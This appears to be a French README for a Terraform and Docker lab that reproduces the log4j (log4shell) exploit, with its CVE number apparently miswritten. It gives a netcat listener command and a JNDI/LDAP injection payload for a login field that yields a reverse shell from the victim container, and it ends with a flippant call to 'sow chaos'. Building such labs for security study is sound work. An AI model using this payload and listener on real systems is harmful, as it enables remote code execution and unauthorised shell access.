
Terraform et ressources Docker pour monter rapidement un test de CVE-2021-44428
Ce dépôt est configuré pour tester rapidement la vulnérabilité log4j à l'aide de Docker et de Hashicorp Terraform. Tous les composants de ce test s'exécuteront dans des conteneurs Docker sur le réseau Docker, accessibles via 'host.docker.internal'.
Cet environnement de test est dérivé d'un excellent article de blog de Raxis : (https://raxis.com/blog/log4j-exploit)
L'application vulnérable et le code d'exploitation proviennent de cyberxml (https://github.com/cyberxml/log4j-poc).
Tout ce que j'ai fait, c'est codifier l'environnement pour qu'il soit facile à déployer et à tester cette délicieuse exploitation.
Je n'assume aucune responsabilité en cas d'effets indésirables ou d'actions malveillantes pouvant résulter de l'utilisation du contenu de ce dépôt. Point final. C'est à vous de décider si ces éléments sont dignes de confiance et il est également de votre responsabilité d'utiliser ces informations de manière éthique. Je publie simplement ces ressources afin que les chercheurs, les étudiants et les professionnels de la sécurité puissent créer rapidement un environnement et tester l'exploitation par eux-mêmes. Seacrest out.
Ouvrez un shell dans le conteneur log4j_netcat à l'aide de 'docker exec -it netcat /bin/bash' ou d'une commande similaire. C'est ici que vous recevrez votre connexion shell vers le serveur victime une fois qu'elle sera établie.
Dans votre session au sein du conteneur log4j_netcat, saisissez la commande suivante pour démarrer l'écouteur :
nc -lv -s 0.0.0.0 -p 9001
Dans votre navigateur, accédez à http://host.docker.internal:8080/log4shell/
Saisissez ce qui suit dans le champ 'Username' ainsi que ce que vous voulez dans le champ 'Password' :
${jndi:ldap://host.docker.internal:1389/a}
Revenez au shell du conteneur log4j_netcat et observez que vous êtes connecté au serveur victime.
Allez semer le chaos !